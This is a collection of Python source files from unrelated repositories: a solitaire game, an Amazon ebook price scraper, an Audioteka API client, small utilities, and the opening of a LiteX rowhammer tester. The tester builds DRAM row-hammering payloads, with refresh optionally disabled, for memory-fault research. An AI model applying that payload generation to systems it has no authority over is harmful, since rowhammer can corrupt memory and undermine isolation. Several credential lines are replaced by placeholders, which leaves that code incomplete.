card_from_index = self._get_card_index(card_from_str)
card_from = self.cards[card_from_index]
if not card_from.is_face_up():
raise ValueError("Invalid move (hidden card) Pile: %r, Index: %r" % (
card_from.pile_number, card_from.pile_index))
if card_to_str == '':
top_card = self.piles[card_from.pile_number].top()
if card_from.rank_number == 0 and card_from == top_card:
for i, pile in enumerate(self.piles[2:6]):
if pile.can_take(card_from):
moved_card = self.piles[card_from.pile_number].pop()
moved_card.pile_index = len(pile)
moved_card.pile_number = i + 2
pile.add_card(moved_card)
return
elif card_from.rank_number == 12:
for i, pile in enumerate(self.piles[6:]):
if pile.can_take(card_from):
self._move_cards(card_from.pile_number, card_from.pile_index, i + 6)
#moved_card = self.piles[card_from.pile_number].pop()
#moved_card.pile_index = len(pile)
#moved_card.pile_number = i + 6
#pile.add_card(moved_card)
return
else:
raise ValueError("Invalid move (no 'TO' card)")
else:
to_card_index = self._get_card_index(card_to_str)
to_card = self.cards[to_card_index]
to_pile = self.piles[to_card.pile_number]
if not to_pile.can_take(card_from):
raise ValueError("Invalid move (can't take)")
else:
self._move_cards(card_from.pile_number, card_from.pile_index, to_card.pile_number)
return
def won(self):
result = False
for pile in self.piles[2:6]:
result = (len(pile) == 13)
return result
def _get_card_index(self, card):
rank_index = self.ranks.index(card[0:1].upper())
suit_index = self.suits.index(card[1:2].lower())
return 13 * suit_index + rank_index
def _move_cards(self, from_pile_number, card_index, to_pile_number):
temp_pile = []
while len(self.piles[from_pile_number]) > card_index:
temp_pile.append(self.piles[from_pile_number].pop())
for i in range(0, len(temp_pile)):
card = temp_pile.pop()
card.pile_number = to_pile_number
card.pile_index = len(self.piles[to_pile_number])
self.piles[to_pile_number].add_card(card)
```
#### File: pyklondike/PyKlondike/main.py
```python
from sys import argv
from sys import stdout
from playingCard import PlayingCard
from cardPile import CardPile
from tablePile import TablePile
from discardPile import DiscardPile
from drawPile import DrawPile
from suitPile import SuitPile
from game import Game
_COLOR_RESET = '\033[0m'
_BLACK_CARD_COLOR = '\033[30;47m'
_RED_CARD_COLOR = '\033[31;47m'
_EMPTY_PILE_COLOR = '\033[37;40m'
#class SuitPile(CardPile):
# def __init__(self):
# pass
#class DiscardPile(CardPile):
# def __init__(self):
# pass
class Controller(object):
def __init__(self):
self.table_piles = []
#for i in (0,7)
class ConsolePrinter(object):
def __init__(self):
pass
def draw_table(self):
pass
def draw_card(card):
if card.is_face_up == False:
return _EMPTY_PILE_COLOR + '-<*>-' + _COLOR_RESET
elif card.suit == 'c' or card.suit == 's':
text_color = _BLACK_CARD_COLOR # Black text on White Background
else:
text_color = _RED_CARD_COLOR # Red text on White Background
return "%s %s %s %s" % (text_color, card.rank, card.suit, _COLOR_RESET)
def draw_empty_pile():
return '%s|___|%s' % (_EMPTY_PILE_COLOR, _COLOR_RESET)
def draw_non_table_pile(pile):
if len(pile) == 0:
return draw_empty_pile()
elif pile.count_facing_up() > 0:
return draw_card(pile[-1])
else:
return '%s---' % len(pile)
def draw_table_pile_summary_row(piles):
result = ''
for i, pile in enumerate(piles):
result += '%s----' % pile.count_facing_down()
if i < 6:
result += ' '
return result;
def draw_table_pile_row(piles, row_index):
result = ''
for i, pile in enumerate(piles):
card_to_print = pile.get_face_up_card(row_index)
if card_to_print == None:
result += ' '
else:
result += draw_card(card_to_print)
if i < 6:
result += ' '
return result
def draw_board(piles, out=stdout):
table_pile_rows = 0
for pile in piles[6:13]:
pile_rows = pile.count_facing_up()
if pile_rows > table_pile_rows:
table_pile_rows = pile_rows
pile_row_output = ''
for i in range(0, table_pile_rows):
pile_row_output += draw_table_pile_row(piles[6:13], i)
pile_row_output += '\n'
output = """
%s %s %s %s %s %s
%s
%s
\033[0m""" % (draw_non_table_pile(piles[0]), draw_non_table_pile(piles[1]),
draw_non_table_pile(piles[2]), draw_non_table_pile(piles[3]),
draw_non_table_pile(piles[4]), draw_non_table_pile(piles[5]),
draw_table_pile_summary_row(piles[6:13]),
pile_row_output)
out.write(output)
klondike = Game()
klondike.deal()
continue_game = True
while continue_game:
if klondike.won():
print "\n\t CONGRATULATIONS! \n"
klondike.quit()
continue_game = False
continue
draw_board(klondike.piles)
command = raw_input('> ')
if command == 'newcard':
klondike.draw()
elif command == 'newgame':
klondike.quit()
klondike.deal()
elif command[0:5] == 'move ' and command[8:10] == 'to' and len(command) == 13:
try:
klondike.move_card(command[5:7], command[11:13])
except ValueError:
print '\n\tInvalid move\n'
elif command[0:5] == 'move ' and len(command) == 7:
try:
klondike.move_card(command[5:7])
except ValueError:
print '\n\tInvalid move\n'
elif command == 'quit':
klondike.quit()
continue_game = False
```
#### File: pyklondike/PyKlondike/suitPile.py
```python
from playingCard import PlayingCard
from cardPile import CardPile
class SuitPile(CardPile):
def __init__(self):
super(SuitPile, self).__init__()
def can_take(self, card):
if self.is_empty():
return card.rank == 'A'
top_card = self.top()
return (top_card.suit == card.suit and
(top_card.rank_number + 1) == card.rank_number)
```
#### File: pyklondike/PyKlondike/tablePile.py
```python
from playingCard import PlayingCard
from cardPile import CardPile
class TablePile(CardPile):
def __init__(self):
super(TablePile, self).__init__()
def get_face_up_card(self, index):
pile_index = self.count_facing_down() + index
if pile_index >= len(self._cards):
return None
else:
return self._cards[pile_index]
def pop(self):
result = super(TablePile, self).pop()
if len(self._cards) > 0 and self.count_facing_up() == 0:
self._cards[-1].flip()
return result
def can_take(self, card):
if self.is_empty():
return card.rank_number == 12
top_card = self.top()
return (top_card.rank_number - 1 == card.rank_number and
top_card.color != card.color)
```
#### File: pyklondike/tests/PyKlondike_tests.py
```python
from nose.tools import *
import sys
from StringIO import StringIO
from PyKlondike.game import Game
from PyKlondike.cardPile import CardPile
from PyKlondike.playingCard import PlayingCard
#from PyKlondike.main import *
def foo(out=sys.stdout):
out.write("hello")
def setup():
pass
def test_std_output():
out = StringIO()
foo(out = out)
output = out.getvalue().strip()
assert_equal(output, "hello")
#
#def foo(out=sys.stdout):
# out.write("hello, world!")
#Then the test is much simpler:
#
#def test_foo():
# from foomodule import foo
# from StringIO import StringIO
#
# out = StringIO()
# foo(out=out)
# output = out.getvalue().strip()
# assert output == 'hello world!'
@nottest
def test_new_game_prints_board():
new_board = """
24--- \033[31;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m
0---- 1---- 2---- 3---- 4---- 5---- 6----
\033[31;47m K d \033[0m \033[31;47m 6 d \033[0m \033[30;47m K c \033[0m \033[30;47m 8 c \033[0m \033[30;47m 4 c \033[0m \033[30;47m A c \033[0m \033[31;47m Q h \033[0m
"""
out = StringIO()
game = Game(out=out, no_shuffle=True)
slice_start = 0
slice_end = min((slice_start + 9), len(new_board))
game.deal()
output = out.getvalue()
# assert_equal(output[slice_start:slice_end],
# new_board[slice_start:slice_end])
@nottest
def test_deal():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
assert_equal(13, len(game.piles))
assert_equal(24, len(game.piles[0]))
for i, pile in enumerate(game.piles[1:6]):
assert_equal(0, len(pile))
for i, pile in enumerate(game.piles[6:]):
assert_equal(i + 1, len(pile))
@nottest
def test_draw_flips_one_card_from_draw_pile_to_discard_pile():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
expected_draw_pile_size = len(game.piles[0]) - 1
game.draw()
assert_equal(expected_draw_pile_size, len(game.piles[0]))
assert_equal(1, len(game.piles[1]))
assert_true(game.piles[1][0].is_face_up())
@nottest
def test_quit_ends_game():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
game.quit()
output = out.getvalue()[-22:]
assert_equal(0, len(game.piles))
# assert_equal(output, "\n\tThanks for Playing!\n")
@nottest
def test_draw_non_table_pile_with_no_face_up_cards():
pile = CardPile()
cards = [PlayingCard('A', 's'), PlayingCard(2, 's'), PlayingCard(3, 's')]
for card in cards:
pile.append(card)
result = draw_non_table_pile(pile)
assert_equal('3---', result)
@nottest
def test_draw_non_table_pile_with_ace_up_card():
pile = CardPile()
cards = [PlayingCard('A', 's'), PlayingCard(2, 's'), PlayingCard(3, 's')]
for card in cards:
card.flip()
pile.append(card)
result = draw_non_table_pile(pile)
assert_equal('\033[30;47m 3 s \033[0m', result)
@nottest
def test_draw_non_table_pile_with_empty_pile():
pile = CardPile()
result = draw_non_table_pile(pile)
assert_equal('\033[37;40m|___|\033[0m', result)
@nottest
def test_draw_card():
cards = [PlayingCard('A', 's'), PlayingCard(0, 'h')]
result = draw_card(cards[0])
assert_equal('\033[30;47m A s \033[0m', result)
result = draw_card(cards[1])
assert_equal('\033[31;47m 0 h \033[0m', result)
@nottest
def test_draw_table_pile_summary_row():
card = PlayingCard('A', 's')
card1 = PlayingCard(2, 's')
card1.flip()
pile0 = TablePile()
pile1 = TablePile()
pile1.append(card)
pile2 = TablePile()
pile2.append(card)
pile2.append(card1)
piles = [pile0, pile1, pile2, pile0, pile1, pile2, pile0]
result = draw_table_pile_summary_row(piles)
assert_equal('0---- 1---- 1---- 0---- 1---- 1---- 0----', result)
@nottest
def test_draw_table_pile_row():
card = PlayingCard('A', 's')
card1 = PlayingCard(2, 's')
card1.flip()
pile0 = TablePile()
pile1 = TablePile()
pile1.append(card)
pile2 = TablePile()
pile2.append(card)
pile2.append(card1)
piles = [pile0, pile1, pile2, pile0, pile1, pile2, pile0]
result = draw_table_pile_row(piles, 0)
assert_equal(' \033[30;47m 2 s \033[0m \033[30;47m 2 s \033[0m ', result)
```
|
{
"source": "jedrivisser/amazon_ebook_specials",
"score": 3
}
|
#### File: jedrivisser/amazon_ebook_specials/ebook_specials.py
```python
import urllib
import urllib2
import unicodedata
import cookielib
import re
import ConfigParser
import os
from bs4 import BeautifulSoup
class EbookSpecials:
"""
Amazon e-book Specials checker
This program checks for books by <authors> (using their amazon ID) which
cost less than <price> and filters out all books in <ignore>.
You can overwrite <price> for a specific book by adding its name and value
to the <overwrite> dictionary
"""
def __init__(self):
# Instance attributes set by config
self.max_price = None
self.login = None
self.email = None
self.password = None
self.use_proxy = None
self.proxy = None
self.authors = None
self.ignore = None
self.own = None
self.overwrite = None
self.books = None
self.load_config()
# Set up proxy, opener and cookies ####################################
cj = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
self.opener.addheaders = [('User-Agent',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0'), ]
if self.use_proxy:
self.opener.add_handler(
urllib2.ProxyHandler({"https": self.proxy, "http": self.proxy}))
if self.login:
self.log_in()
# Go through whole list of authors and call getPage() for each result
# page for each author ################################################
message = unicode('')
for authorID in self.authors:
# Run once to get first page and a page count #####################
result = self.check_page(authorID)
if result:
m, pages, more = result
message += unicode(m)
# Run for the other pages if more than one needs to be loaded
for page in range(2, pages + 1):
if more:
m, more = self.check_page(authorID, page)
message += unicode(m)
else:
print "Could not connect"
return
for bookID in self.books.keys():
max_book_price = self.max_price if float(
self.books[bookID]) < 0 else float(self.books[bookID])
m = self.check_book(bookID, max_book_price)
message += unicode(m)
message = unicodedata.normalize('NFKD', message).encode('ascii', 'ignore')
if message == '':
message = "No books cheaper than $" + str(self.max_price)
print "======e-books cheaper than $" + str(self.max_price) + "======\n" + message
def check_page(self, author_id, page=1):
"""
Checks one page for specials and returns the found specials,
the number of pages, and if you should look for more specials.
"""
url = "http://www.amazon.com/r/e/" + author_id + \
"/?rh=n%3A283155%2Cp_n_feature_browse-bin%3A618073011&sort=price&page=" + str(page)
try:
data = str(self.opener.open(url).read())
except urllib2.HTTPError, e:
print e.code
print e.read()
return None
soup = BeautifulSoup(data, "html.parser")
books = soup("div", {"id": re.compile('result_.*')})
message = ""
more = True
for book in books:
book_id = book['name']
name = book('h3')[0]('a')[0].string
link = "http://www.amazon.com/dp/" + book_id
prices = book('div', 'tp')[0]('table')[0]('tr')[1]('td')[2]('a')
# if book has no price available
if not len(prices) == 0:
# needed to ignore kindleUnlimited $0.00
price_string = prices[len(prices) - 1].string
price_float = float(price_string[1:])
if price_float < self.max_price:
if book_id in self.ignore or book_id in self.own:
continue
elif book_id in self.overwrite:
if price_float < float(self.overwrite[book_id]):
message += name + " " + price_string + " - " + link + "\n"
else:
message += name + " " + price_string + " - " + link + "\n"
else:
# sets more to false if prices on page go above 'max_price'
more = False
if page == 1:
if soup('span', "pagnDisabled"):
pages = int(soup('span', "pagnDisabled")[0].string)
elif soup('span', "pagnLink"):
pages = int(soup('span', "pagnLink")[-1].string)
else:
pages = 1
return message, pages, more
else:
return message, more
def check_book(self, book_id, max_price):
"""Check price of specific book from the [BOOKS] section"""
url = "http://www.amazon.com/dp/" + book_id
try:
data = str(self.opener.open(url).read())
except urllib2.HTTPError, e:
print e.code
print e.read()
return None
soup = BeautifulSoup(data, "html.parser")
name = soup.title.string[12:-14]
price = soup("tr", "kindle-price")[0]("td")[1].find(text=True).strip()
d_price = float(price[1:])
message = ""
if d_price < max_price:
message = name + " " + price + " - " + url + "\n"
return message
def log_in(self):
"""Log-in to you amazon account"""
# Get and set form params #############################################
url_login_page = "https://www.amazon.com/ap/signin/182-9380882-4173709" + \
"?openid.assoc_handle=usflex" + \
"&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" + \
"&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" + \
"&openid.mode=checkid_setup" + \
"&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0" + \
"&openid.return_to" + \
"=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dgno_signin"
try:
response = self.opener.open(url_login_page)
except urllib2.HTTPError, e:
print e.code
print e.read()
exit(1)
return None
response_text = response.read()
pattern = '<input(.*?)name="(.+?)"(.*?)value="(.+?)"(.*?)/>'
matches = re.findall(pattern, response_text)
params = dict()
for value in matches:
if value[1] != 'email' and value[1] != 'create':
params[value[1]] = value[3]
params['email'] = self.email
params['password'] = <PASSWORD>
params = urllib.urlencode(params)
# Post login details ##################################################
url_login_post = "https://www.amazon.com/ap/signin"
try:
response = self.opener.open(url_login_post, params)
except urllib2.HTTPError, e:
print e.code
print e.read()
exit(1)
if response.geturl() == "https://www.amazon.com/gp/yourstore/home?ie=UTF8&ref_=gno_signin&":
print "Log-in for " + self.email + " successful."
else:
# response.geturl() == "https://www.amazon.com/ap/signin"
print "Log-in for " + self.email + " unsuccessful."
print "Double check your password in ebook.ini."
print "quitting."
exit(1)
def load_config(self):
"""Loads config from file"""
config_file = os.path.splitext(__file__)[0] + ".ini"
config = ConfigParser.SafeConfigParser(allow_no_value=True)
config.optionxform = str
config.read(config_file)
self.max_price = config.getfloat("CONFIG", "max_price")
self.login = config.getboolean("CONFIG", "login")
if self.login:
self.email = config.get("CONFIG", "email")
self.password = config.get("CONFIG", "password")
self.use_proxy = config.getboolean("CONFIG", "use_proxy")
if self.use_proxy:
self.proxy = config.get("CONFIG", "proxy")
self.authors = config.options("AUTHORS")
self.ignore = config.options("IGNORE")
self.own = config.options("OWN")
self.overwrite = dict(config.items("OVERWRITE"))
self.books = dict(config.items("BOOKS"))
if __name__ == "__main__":
EbookSpecials()
```
|
{
"source": "jedrus2000/arimr2traces",
"score": 2
}
|
#### File: arimr2traces/arimr2traces/arimr_login.py
```python
from PyQt5.QtWidgets import QDialog
from PyQt5 import uic
from .resources.resources import ARIMR_LOGIN_DIALOG_FORM
class ARIMRLoginDialog(QDialog):
"""
ARiMR login page
"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
uic.loadUi(ARIMR_LOGIN_DIALOG_FORM, self)
self.loginLineEdit.setFocus()
```
#### File: arimr2traces/arimr2traces/fetching_data_progress_dialog.py
```python
from PyQt5.QtWidgets import QDialog
from PyQt5 import uic
from .resources.resources import FETCHING_DATA_PROGRESS_DIALOG_FORM
class FetchingDataProgressDialog(QDialog):
"""
Progress dialog while fetching data
"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
uic.loadUi(FETCHING_DATA_PROGRESS_DIALOG_FORM, self)
self.cancelButton.clicked.connect(self.reject)
def setProgressValue(self, value):
self.progressBar.setValue(value)
if value == self.progressBar.maximum():
self.accept()
```
|
{
"source": "jedrus2000/audtekapi",
"score": 2
}
|
#### File: audtekapi/audtekapi/__init__.py
```python
from __future__ import unicode_literals
import hashlib
import binascii
import struct
import re
import requests
from requests.auth import HTTPDigestAuth
import logging
from datetime import datetime
__version__ = '0.2.1'
AUDIOTEKA_API_URL = "https://proxy3.audioteka.com/pl/MobileService.svc/"
AUDIOTEKA_API_VERSION = "2.3.15"
DEFAULT_HEADERS = {"User-agent": "Android/" + AUDIOTEKA_API_VERSION}
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def get_categories(
category_name, page=1, per_page_count=100, samples=False, session=None, headers=None
):
"""
gets Categories
:param category_name:
:param page:
:param per_page_count:
:param samples:
:param session:
:param headers:
:return:
"""
return _post(
"categories",
{},
session,
{
"categoryName": category_name,
"page": page,
"samples": samples,
"count": per_page_count,
},
headers,
).json()
def login(user_login, user_password, session=None, headers=None):
"""
signing in into Audioteka.
:param user_login:
:param user_password:
:param session:
:param headers:
:return: credentials Dict with login data,token and hashed password
{
"userLogin": "yyyyyyyyyyyyyyyyy",
"userPassword": "<PASSWORD>",
"HashedPassword": "<PASSWORD>",
"AuthenticationToken": "<PASSWORD>",
"Salt": "3666666666",
"Status": "LoginStatusOk"
}
"""
headers = headers if headers else DEFAULT_HEADERS
headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
credentials = {"userLogin": user_login, "userPassword": <PASSWORD>}
r = _post("login", credentials, session, {}, headers)
logged_in_data = r.json()
if logged_in_data["Status"] == "LoginStatusErr":
_set_response_login_failed(r)
r.raise_for_status()
logged_in_data["HashedPassword"] = _get_hashed_password(
credentials["userPassword"], logged_in_data["Salt"]
)
logged_in_data["userLogin"] = credentials["userLogin"]
return logged_in_data
def get_shelf(credentials, session=None, headers=None):
"""
gets personal shelf content
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"get_shelf", credentials, session, {"onlyPaid": "false"}, headers
).json()
def get_shelf_item(product_id, credentials, session=None, headers=None):
"""
gets one book details
:param product_id:
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"shelf_item", credentials, session, {"productId": product_id}, headers
).json()
def get_chapters(
tracking_number, line_item_id, credentials, session=None, headers=None
):
"""
get list of chapters from book
:param tracking_number:
:param line_item_id:
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"get_chapters",
credentials,
session,
{"lineItemId": line_item_id, "trackingNumber": tracking_number},
headers,
).json()
def get_chapter_file(
tracking_number,
line_item_id,
download_server_url,
download_server_footer,
file_name,
credentials,
stream=False,
session=None,
headers=None,
):
"""
gets chapter file.
:param tracking_number:
:param line_item_id:
:param download_server_url:
:param download_server_footer:
:param file_name:
:param credentials:
:param stream: Default: False. If True, returns stream (chunks)
:param session:
:param headers:
:return: Requests response
"""
s = session if session else requests.session()
if not headers:
headers = DEFAULT_HEADERS
headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
headers["XMobileAppVersion"] = DEFAULT_HEADERS["User-agent"]
headers["Range"] = "bytes=0-"
url = (
download_server_url
+ "?TrackingNumber={0}&LineItemId={1}&FileName={2}&".format(
tracking_number, line_item_id, file_name
)
+ download_server_footer
)
r = s.get(
url,
auth=HTTPDigestAuth(credentials["userLogin"], credentials["HashedPassword"]),
headers=headers,
stream=stream
)
return r
def epoch_to_datetime(aud_dt):
"""
converts datetime in format: /Date(1545693401480+0100)/ into Datetime
:param aud_dt:
:return:
"""
result = re.search(r"Date\((.*)\+(.*)\)", aud_dt)
epoch_utc = result.group(1)
local_tz_offset = result.group(2)
try:
return datetime.utcfromtimestamp(
float(epoch_utc) if len(epoch_utc) < 11 else float(epoch_utc) / 1000
)
except (TypeError, ValueError) as e:
logger.error(str(e) + " Input epoch_utc: " + str(epoch_utc))
def _get_hashed_password(user_password, salt):
"""
calculates hashed password
Salt can be get calling `login`
:param user_password:
:param salt:
:return:
"""
salt_bytes = struct.pack(">I", int(salt))
password_encoded = user_password.encode("utf-16le")
hash_bytes = hashlib.sha256(salt_bytes + password_encoded).digest()
hashed_password = binascii.hexlify(salt_bytes + hash_bytes).upper()
return bytes(hashed_password).decode()
def _post(endpoint, credentials, session=None, data=None, headers=None):
d, h = _merge_into_data_and_headers(
credentials, data, headers if headers else DEFAULT_HEADERS
)
s = session if session else requests.session()
#
r = s.post(AUDIOTEKA_API_URL + endpoint, data=d, headers=h)
j = r.json()
if j == "login_failed":
_set_response_login_failed(r)
elif j == "item_not_found":
_set_response_item_not_found(r)
r.raise_for_status()
return r
def _merge_into_data_and_headers(credentials, data, headers):
if not credentials:
return data, headers
ret_data = dict()
ret_headers = dict()
ret_data["userLogin"] = credentials["userLogin"]
if "userPassword" in credentials:
ret_data["userPassword"] = credentials["userPassword"]
else:
ret_headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
ret_headers["XMobileTokenAuthentication"] = credentials["AuthenticationToken"]
ret_headers["XMobileUserLogin"] = credentials["userLogin"]
return _merge_dicts(data, ret_data), _merge_dicts(ret_headers, headers)
def _merge_dicts(*dict_args):
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def _set_response_login_failed(r):
r.status_code = 401
r.reason = "Login failed"
def _set_response_item_not_found(r):
r.status_code = 404
r.reason = "Item not found"
```
|
{
"source": "jedrus2000/mapster",
"score": 2
}
|
#### File: mapster/mapster/tools.py
```python
import codecs
from io import StringIO
from pathlib import Path
import colorama
colorama.init()
from colorama import Fore, Back, Style
import click
import csv
import io
def echo_error(message=None, file=None, nl=True, err=True, color=None):
if message:
message = f"{Fore.RED}{message}{Fore.RESET}"
click.echo(message=message, file=file, nl=nl, err=err, color=color)
def echo_warning(message=None, file=None, nl=True, err=True, color=None):
if message:
message = f"{Fore.YELLOW}{message}{Fore.RESET}"
click.echo(message=message, file=file, nl=nl, err=err, color=color)
def get_file_utf8_encoding(file_path: Path):
first_bytes = min(32, file_path.stat().st_size)
with file_path.open('rb') as f:
raw = f.read(first_bytes)
if raw.startswith(codecs.BOM_UTF8):
return 'utf-8-sig'
else:
return 'utf-8'
def dict2csv(d: dict) -> str:
csvio: StringIO = io.StringIO(newline='')
writer = csv.DictWriter(csvio, fieldnames=list(d[next(iter(d))].keys()), dialect='excel', quoting=csv.QUOTE_ALL)
writer.writeheader()
for key, item in d.items():
writer.writerow(item)
return_value = csvio.getvalue()
csvio.close()
return return_value
def csv2dict(csv_file, key_name):
reader = csv.DictReader(csv_file)
result = {}
for d in reader:
result[d.get(key_name)] = d
return result
```
|
{
"source": "jedrus2000/totra",
"score": 3
}
|
#### File: totra/totra/main.py
```python
from docopt import docopt
import totra
def __get_option_param(arguments, option_name, param_name=None):
if not param_name:
param_name = option_name
return arguments['<{0}>'.format(param_name)].split(',') if arguments['{0}'.format(option_name)] else None
def __get_option_value_list(arguments, option_name):
return arguments['{0}'.format(option_name)].split(',') if arguments['{0}'.format(option_name)] else None
def main():
arguments = docopt(__doc__, version='TopTracker helper. Version: {0}'.format(totra.__version__))
activities_command = arguments['activities']
how_much_hours_command = arguments['how_much_hours']
output_format = arguments['--format']
projects = __get_option_value_list(arguments, '--projects')
workers = __get_option_value_list(arguments, '--workers')
from_date = arguments['--from']
to_date = arguments['--to']
login_name = arguments['-l']
login_password = arguments['-p']
output_filename = arguments['-o']
if how_much_hours_command:
data = totra.how_much_hours(login_name, login_password, workers=workers,
projects=projects, start_date=from_date, end_date=to_date)
totra.save_output(data, output_filename)
if activities_command:
data = totra.report_activities(login_name, login_password, workers=workers,
projects=projects, start_date=from_date, end_date=to_date)
data_in_requested_format = totra.format_activities(data, format=output_format)
totra.save_output(data_in_requested_format, output_filename)
```
|
{
"source": "jedrzejasgard/USB_page",
"score": 2
}
|
#### File: src/usbcennik/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from django.views.generic import View
from django.template.loader import get_template
from .utils import render_to_pdf
def home_page(request):
return render(request,'base.html')
def edycja_cen(request):
return render(request,'edytuj_ceny.html')
class GeneratePDF(View):
def get(self, request, *args , **kwargs):
template = get_template('cennikUSB.html')
context = {
'index': '19340' ,
'cena' : '12,40' ,
'data' : '12-30-2012'
}
html = template.render(context)
pdf = render_to_pdf('cennikUSB.html', context)
if pdf:
response = HttpResponse(pdf, content_type='application/pdf')
filename = "Cennik_USB.pdf"
content = 'inline; filename="%s"' %(filename)
download = request.GET.get('download')
if download:
content = 'attachment; filename="%s"' %(filename)
response['Content-Disposition'] = content
return response
return HttpResponse('Coś poszło nie tak i PDF się nie wygenerował')
```
|
{
"source": "jedrzejboczar/litex-rowhammer-tester",
"score": 2
}
|
#### File: rowhammer_tester/scripts/rowhammer.py
```python
import time
import random
import argparse
from math import ceil
from rowhammer_tester.gateware.payload_executor import Encoder, OpCode, Decoder
from rowhammer_tester.scripts.utils import (
memfill, memcheck, memwrite, DRAMAddressConverter, litex_server, RemoteClient,
get_litedram_settings, get_generated_defs)
################################################################################
def get_expected_execution_cycles(payload):
cycles = 0
for i, instr in enumerate(payload):
cycles += 1
if instr.op_code == OpCode.NOOP and instr.timeslice == 0: # STOP
break
elif instr.op_code == OpCode.LOOP:
# there should be no STOP or LOOP instructions inside loop body
body = payload[i - instr.jump:i]
cycles += instr.count * sum(ii.timeslice for ii in body)
else:
# -1 because we've already included 1 cycle for this instruction
cycles += instr.timeslice - 1
return cycles
# returns the number of refreshes issued
def encode_one_loop(*, unrolled, rolled, row_sequence, timings, encoder, bank, refresh_op, payload):
tras = timings.tRAS
trp = timings.tRP
trefi = timings.tREFI
trfc = timings.tRFC
local_refreshes = 1
payload.append(encoder.I(refresh_op, timeslice=trfc))
# Accumulate an extra cycle for the jump at the end to be conservative
accum = trfc + 1
for idx in range(unrolled):
for row in row_sequence:
if accum + tras + trp > trefi:
payload.append(encoder.I(refresh_op, timeslice=trfc))
# Invariant: time between the beginning of two refreshes
# is is less than tREFI.
accum = trfc
local_refreshes += 1
accum += tras + trp
payload.extend(
[
encoder.I(
OpCode.ACT, timeslice=tras, address=encoder.address(bank=bank, row=row)),
encoder.I(OpCode.PRE, timeslice=trp,
address=encoder.address(col=1 << 10)), # all
])
jump_target = 2 * unrolled * len(row_sequence) + local_refreshes
assert jump_target < 2**Decoder.LOOP_JUMP
payload.append(encoder.I(OpCode.LOOP, count=rolled, jump=jump_target))
return local_refreshes * (rolled + 1)
def encode_long_loop(*, unrolled, rolled, **kwargs):
refreshes = 0
# fill payload so that we have >= desired read_count
count_max = 2**Decoder.LOOP_COUNT - 1
n_loops = ceil(rolled / (count_max + 1))
for outer_idx in range(n_loops):
if outer_idx == 0:
loop_count = ceil(rolled) % (count_max + 1)
if loop_count == 0:
loop_count = count_max
else:
loop_count -= 1
else:
loop_count = count_max
refreshes += encode_one_loop(unrolled=unrolled, rolled=loop_count, **kwargs)
return refreshes
def least_common_multiple(x, y):
gcd = x
rem = y
while (rem):
gcd, rem = rem, gcd % rem
return (x * y) // gcd
def generate_row_hammer_payload(
*,
read_count,
row_sequence,
timings,
bankbits,
bank,
payload_mem_size,
refresh=False,
verbose=True,
sys_clk_freq=None):
encoder = Encoder(bankbits=bankbits)
tras = timings.tRAS
trp = timings.tRP
trefi = timings.tREFI
trfc = timings.tRFC
if verbose:
print('Generating payload:')
for t in ['tRAS', 'tRP', 'tREFI', 'tRFC']:
print(' {} = {}'.format(t, getattr(timings, t)))
acts_per_interval = (trefi - trfc) // (trp + tras)
max_acts_in_loop = (2**Decoder.LOOP_JUMP - 1) // 2
repeatable_unit = min(
least_common_multiple(acts_per_interval, len(row_sequence)), max_acts_in_loop)
assert repeatable_unit >= len(row_sequence)
repetitions = repeatable_unit // len(row_sequence)
print(" Repeatable unit: {}".format(repeatable_unit))
print(" Repetitions: {}".format(repetitions))
read_count_quotient = read_count // repetitions
read_count_remainder = read_count % repetitions
refresh_op = OpCode.REF if refresh else OpCode.NOOP
# First instruction after mode transition should be a NOOP that waits until tRFC is satisfied
# As we include REF as first instruction we actually wait tREFI here
payload = [encoder.I(OpCode.NOOP, timeslice=max(1, trfc - 2, trefi - 2))]
refreshes = encode_long_loop(
unrolled=repetitions,
rolled=read_count_quotient,
row_sequence=row_sequence,
timings=timings,
encoder=encoder,
bank=bank,
refresh_op=refresh_op,
payload=payload)
refreshes += encode_long_loop(
unrolled=1,
rolled=read_count_remainder,
row_sequence=row_sequence,
timings=timings,
encoder=encoder,
bank=bank,
refresh_op=refresh_op,
payload=payload)
# MC refresh timer is reset on mode transition, so issue REF now, this way it will be in sync with MC
payload.append(encoder.I(refresh_op, timeslice=1))
payload.append(encoder.I(OpCode.NOOP, timeslice=0)) # STOP
if verbose:
expected_cycles = get_expected_execution_cycles(payload)
print(
' Payload size = {:5.2f}KB / {:5.2f}KB'.format(
4 * len(payload) / 2**10, payload_mem_size / 2**10))
count = '{:.3f}M'.format(read_count /
1e6) if read_count > 1e6 else '{:.3f}K'.format(read_count / 1e3)
print(' Payload per-row toggle count = {} x{} rows'.format(count, len(row_sequence)))
print(
' Payload refreshes (if enabled) = {} ({})'.format(
refreshes, 'enabled' if refresh else 'disabled'))
time = ''
if sys_clk_freq is not None:
time = ' = {:.3f} ms'.format(1 / sys_clk_freq * expected_cycles * 1e3)
print(' Expected execution time = {} cycles'.format(expected_cycles) + time)
assert len(payload) <= payload_mem_size // 4
return encoder(payload)
################################################################################
class RowHammer:
def __init__(
self,
wb,
*,
settings,
nrows,
column,
bank,
rows_start=0,
no_refresh=False,
verbose=False,
plot=False,
payload_executor=False,
data_inversion=False):
